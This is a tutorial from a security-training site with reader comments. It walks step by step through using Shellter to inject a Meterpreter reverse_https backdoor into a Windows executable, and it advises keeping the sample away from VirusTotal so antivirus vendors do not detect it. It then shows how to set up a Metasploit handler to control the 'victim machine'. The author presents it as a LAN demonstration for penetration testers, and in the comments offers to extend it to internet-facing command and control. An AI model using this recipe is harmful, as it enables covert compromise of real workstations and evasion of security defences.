Tutorial: Avoid Antiviruses and Compromise Workstations – Part 1

March 23, 2017 | Views: 3682

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

It’s 2017 and traditional Antivirus solutions are becoming more and more obsolete with every passing day. The rise of exploit kits and “do it yourself malware” means that organizations can no longer rely solely on Antivirus solutions to keep them safe. In fact, someone with little experience can now make a unique piece of malware that is capable of evading the majority, if not all traditional Antivirus solutions.

This is a guide aimed at all skill levels, from students to professional penetration testers, and aims to show how anyone can create their own unique piece of Malware (capable of evading AV) that gives them remote access to a machine by using Metasploit, and Shellter.

Disclaimer: This guide is for educational purposes only, and can be used on a Local Area Network (LAN) to demonstrate how easily a workstation can be compromised without an organization being aware. This guide is limited to a LAN and does not detail how to set up port forwarding from public IP’s to Private IP’s, command and control servers, or how to configure firewalls. This is largely unnecessary for isolated demonstrations; however, if enough interest is shown I may add this to another guide. No warranty is provided on the accuracy of this guide and it is provided strictly as is. I will not go into what all of the commands are performing in this particular tutorial, but depending on the community response I will look to explain it more in depth in another post.

Meterpreter and Shellter
Creating the backdoor

  1. Elevate to root and download Shellter – Open a terminal and type:
    sudo su
    apt-get install shellter
  2. Find a 32 bit executable vulnerable to PE Injection (the uninstall files found after installing a program work well). Copy this to your Kali Desktop.
  3. Change directory and run Shellter – in the same terminal type:
    cd Desktop
    shellter &
  4. Under Operation mode select automatic and choose your executable target – type:
    <Filename of Vulnerable 32 bit executable>
  5. The program will attempt to find an entry point for the backdoor, if the program throws errors and fails, find a different executable to use.
  6. Under Enable Stealth mode – type:
    Y to attempt to preserve original .exe functionality (Not recommended if you used an uninstall executable)
    N to strip the programs original functionality and just run as a backdoor.
  7. Under Payloads – type:
    L followed by a number to use a native Meterpreter Backdoor
    C to use a custom script
  8. Find out your local IP Address – Open your existing terminal and type:
  9. Note your local IP address i.e. (denoted next to ‘inet’)
  10. Set the destination IP for the payload – Return to Shellter and type:
    <Local IP Address>
    <Local Port to run on i.e. 8080>
  11. You will see Injection: Verified!

Setting up your Kali listener and handler
At this stage, you are halfway there and can copy your created malware to a USB or the like.

Note – This is also your chance to scan it with AV, but I warn you, do not use VirusTotal.com! because VirusTotal.com distributes the sample to AntiVirus vendors and before too long it’ll be detected. An alternative solution such as nodistribute.com will allow you to test it against a large variety of commonly used AV companies without the risk of it being analyzed and added to their list of known signatures.

After you have a coffee or some tea to perk you up, let’s continue with the lesson.

  1. Run the Metasploit framework – Open your existing terminal and type:
  2. Run the Metasploit handler – type:
    use exploit/multi/handler
  3. Set up your handler with the related exploit set on your backdoor – e.g. type:
    set payload windows/meterpreter/reverse_https
    set lport <local port to run on i.e. 8080>
    set lhost <Local IP Address>
  4. Run your listener and handler – type:
  5. This will now create your meterpreter console. Ensure your victim machine is on the same network as you and is within the same broadcast range. Run the infected executable on the victim machine.

At this stage, you should have established a connection to your victim machine and will retain this connection so long as they are running the infected executable. There are many actions that can be performed (and should be performed) upon gaining remote access.

Thank you for taking the time to read through this guide, if you would like to learn more about what occurs when commands are issued, how to remain persistent after gaining access, or what further actions can be taken upon gaining access, feel free to let me know so that I can make another posting. If you’ve found this informative and wish to tip Cybytes please feel free, but it is not a requirement.

Until next time…

Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
  1. Really enjoyed this. Well written and to the point. Would love to hear more on details about how to set up port forwarding from public IP’s to Private IP’s, command and control servers, and how to configure firewalls.


    • Hi there,

      I’m glad that you enjoyed this lesson.
      I can definitely look at doing a write-up on port forwarding and configuring firewalls to make the malware executable over the internet. It may not be for a little bit, but if the interest continues then I’ll look into doing another tutorial.

      No problem at all.

Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?